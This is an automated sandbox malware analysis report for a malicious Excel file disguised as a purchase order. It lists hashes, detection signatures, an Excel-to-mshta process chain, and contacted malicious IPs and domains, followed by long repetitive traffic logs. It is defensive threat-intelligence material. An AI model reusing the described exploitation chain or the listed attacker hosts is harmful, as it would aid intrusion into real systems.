Edit tour

Windows Analysis Report
PURCHASE ORDER 517-2025.xla.xlsx

Overview

General Information

Sample name:PURCHASE ORDER 517-2025.xla.xlsx
Analysis ID:1649448
MD5:4d57f2dfe4050bf6605af3c1be23d9e2
SHA1:db1b4d7cd15f21378a456e7fdf49648b39ba731a
SHA256:2edf703005001488ac02fe1c1b08784c938d944a5e8dd4345b00ea3d6e7b68f6
Tags:xlaxlsxuser-abuse_ch
Infos:

Detection

Score:56
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • EXCEL.EXE (PID: 6896 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 7444 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 7536 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 7716 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PURCHASE ORDER 517-2025.xla.xlsx" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 6896, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 7444, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 147.79.86.93, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6896, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49697
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.7, DestinationIsIpv6: false, DestinationPort: 49697, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6896, Protocol: tcp, SourceIp: 147.79.86.93, SourceIsIpv6: false, SourcePort: 443
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-26T19:48:43.839468+010020283713Unknown Traffic192.168.2.74969913.107.246.41443TCP
2025-03-26T19:48:51.583738+010020283713Unknown Traffic192.168.2.74970113.107.246.41443TCP
2025-03-26T19:48:51.593285+010020283713Unknown Traffic192.168.2.74970213.107.246.41443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: PURCHASE ORDER 517-2025.xla.xlsxVirustotal: Detection: 31%Perma Link
Source: PURCHASE ORDER 517-2025.xla.xlsxReversingLabs: Detection: 22%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 147.79.86.93:443 -> 192.168.2.7:49697 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.7:49699 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
Source: global trafficDNS query: name: agr.my
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 147.79.86.93:443
Source: global trafficTCP traffic: 147.79.86.93:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 172.245.123.32:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 172.245.123.32:80
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 13.107.246.41:443
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 13.107.246.41:443 -> 192.168.2.7:49699
